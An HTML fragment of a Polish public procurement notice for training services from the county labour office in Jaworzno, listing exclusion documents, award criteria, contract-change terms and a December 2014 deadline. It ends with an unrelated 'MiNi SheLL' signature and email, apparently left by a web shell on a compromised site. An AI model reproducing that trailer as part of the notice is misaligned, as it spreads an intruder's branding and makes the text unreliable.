<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - posiadanie certyfikatu jakości usług - 0.1</li>
<li>3 - prowadzenie analiz skuteczności i efektywności przeprowadzanych szkoleń - 0.05</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie 	uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było 	wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania 	przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu 
     pisemnie propozycję  zmiany  wraz  z  jej  uzasadnieniem,    wskazując  osobę/y o  co  najmniej
	porównywalnych kwalifikacjach jakie określono w SIWZ. Jednocześnie Wykonawcy nie	przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany	osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przedmiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
	w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której	nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu	realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie	propozycję zmiany wraz z jej uzasadnieniem. Zmiana terminu szkolenia  - w szczególnie	uzasadnionych przypadkach, np. niezakwalifikowanie się odpowiedniej liczby	uczestników szkolenia - może także nastąpić z inicjatywy Zamawiającego.	Jednocześnie Wykonawcy nie  przysługuje roszczenie o zwrot kosztów wynikających	bezpośrednio lub pośrednio ze zmiany terminu realizacji przedmiotu zamówienia.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego,                           	w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca	przeprowadzenia szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu	pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca 	szkolenia o co najmniej porównywalnych warunkach jakie określono w SIWZ, przy	jednoczesnym spełnieniu warunku, o którym mowa w Rozdziale 3, pkt. 3, ppkt. 3.1 SIWZ. 	Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających 	bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych 	przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym 	dokonanie kolejnego naboru, brak osób spełniających warunki skierowania na szkolenie, 	Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-jaworzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2014 godzina 08:00, miejsce: Powiatowy Urząd Pracy  Jaworznie, ul. Północna 9b, 43-600 Jaworzno I piętro, pokój nr 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach Projektu Kuźnia przyszłych pracowników współfinansowanego  ze środków    Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego- Poddziałania 7.2.1     Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com